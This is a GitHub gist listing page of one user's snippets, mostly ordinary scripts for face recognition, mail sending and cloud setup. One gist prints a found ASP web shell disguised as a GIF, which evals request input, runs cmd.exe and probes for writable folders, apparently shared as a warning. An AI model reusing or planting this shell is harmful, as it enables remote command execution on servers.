Skip to content

Instantly share code, notes, and snippets.

View jonaslejon's full-sized avatar
:octocat:
Working from home

Jonas Lejon jonaslejon

:octocat:
Working from home
View GitHub Profile
@jonaslejon
jonaslejon / gist:4945730
Created February 13, 2013 16:18
Face recognition in Raspberry Pi with OpenCV and sound with espeak
#!env python
import cv,pprint,os
from datetime import datetime
HAAR_CASCADE_PATH = "/usr/share/opencv/haarcascades/haarcascade_frontalface_default.xml"
CAMERA_INDEX = 0
def detect_faces(image, last):
faces = []

Keybase proof

I hereby claim:

  • I am jonaslejon on github.
  • I am jonaslejon (https://keybase.io/jonaslejon) on keybase.
  • I have a public key whose fingerprint is 57F6 2694 A9D1 EF48 10AB 396A 27AB BA2E B836 3126

To claim this, I am signing this object:

@jonaslejon
jonaslejon / Mailgun PHP API with curl
Last active July 31, 2021 21:29
Send mail with Mailgun API version 2 and PHP. Should also work with version 3 of the Mailgun API
define("DOMAIN", "test.se");
define("MAILGUN_API", "XXX123"); // Mailgun Private API Key
function br2nl($string) {
return preg_replace('/\<br(\s*)?\/?\>/i', "\n", $string);
}
function mg_send($to, $subject, $message) {
$ch = curl_init();
@jonaslejon
jonaslejon / tarsnap-install.sh
Last active February 3, 2017 06:46
Tarsnap install
#!/bin/sh
#
# Author: Jonas Lejon <jonas.gist@triop.se>
# 2014-05-30 For Ubuntu
#
# Usage:
# ./tarsnap-install.sh <tarsnap-email>
#
if [ -z "$1" ]
then
userdata = """
#cloud-config
coreos:
etcd:
# generate a new token for each unique cluster from https://discovery.etcd.io/new
discovery: https://discovery.etcd.io/my_unique_token
# multi-region and multi-cloud deployments need to use $public_ipv4
addr: $public_ipv4:4001
peer-addr: $public_ipv4:7001
#!/usr/bin/env python
##
## Jonas Lejon 2014
##
## sudo pip install apache-libcloud names
import os, sys, time
import names
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
@jonaslejon
jonaslejon / spamcheck.php
Last active January 13, 2017 12:23
PHP DNSBL Spamcheck
<?php
$url = "http://some.url";
$surbl = new Net_DNSBL_SURBL();
$dnsbl->setBlacklists(array('list.dnsbl.org','multihop.dnsbl.org','sbl-xbl.spamhaus.org', 'bl.spamcop.net', 'dnsbl.sorbs.net', 'cbl.abuseat.org','blackholes.five-ten-sg.com','dul.dnsbl.sorbs.net', 'zen.spamhaus.org'));
if ($surbl->isListed($url))
return false;
reuturn true;
@jonaslejon
jonaslejon / gist:e2a431734a8d20ba53f3
Created September 7, 2014 20:00
Commoncrawl worker
#!/bin/sh
#JAVA_HOME=/ebs/jdk1.7.0_09/
export JAVA_HOME=/ebs/jdk1.7.0_09/
SEGMENT=$1
s3cmd --add-header=x-amz-request-payer:requester ls s3://aws-publicdatasets/common-crawl/parse-output/segment/$SEGMENT/ > $SEGMENT.txt
grep metadata $SEGMENT.txt > tmpfile
mv tmpfile $SEGMENT.txt
mkdir metadata/$SEGMENT/
cd metadata/$SEGMENT
for a in `cat ../../$SEGMENT.txt|awk '{print $4}'`; do s3cmd --continue --add-header=x-amz-request-payer:requester get $a; done
@jonaslejon
jonaslejon / gist:0480514c4d7821a0a9fb
Created September 26, 2014 06:26
Found this malicious file in our server /tmp
GIF89alovealihack<%eval request("alihack.com")%>
<%On Error Resume Next
Response.write CreateObject("wscript.shell").exec("cmd.exe /c whoami").StdOut.ReadAll%>|
<%Set Fso=server.createobject("scr"&"ipt"&"ing"&"."&"fil"&"esy"&"ste"&"mob"&"jec"&"t")
sPath=replace(Server.MapPath("\"),"/", "\")
Function CheckDirIsOKWrite(DirStr)
On Error Resume Next
Fso.CreateTextFile(DirStr&"\temp.tmp")
if Err.number<>0 then
Err.Clear()
@jonaslejon
jonaslejon / eljefe
Last active August 29, 2015 14:07
Eljefe malware
eljefe-2.1/cuckoo/web/tmp_uploads/tmpHXwzkX/384d89e233ce04df0df3f68ab43afcb80a0db375e8c9204f68afb211a35311c3.exe: Win.Trojan.Generickd-217 FOUND
eljefe-2.1/cuckoo/web/tmp_uploads/tmpAa9NTe/384d89e233ce04df0df3f68ab43afcb80a0db375e8c9204f68afb211a35311c3.exe: Win.Trojan.Generickd-217 FOUND
eljefe-2.1/cuckoo/web/tmp_uploads/tmp6c_gCf/384d89e233ce04df0df3f68ab43afcb80a0db375e8c9204f68afb211a35311c3.exe: Win.Trojan.Generickd-217 FOUND
eljefe-2.1/cuckoo/web/tmp_uploads/tmp18VjC9/384d89e233ce04df0df3f68ab43afcb80a0db375e8c9204f68afb211a35311c3.exe: Win.Trojan.Generickd-217 FOUND
Etc.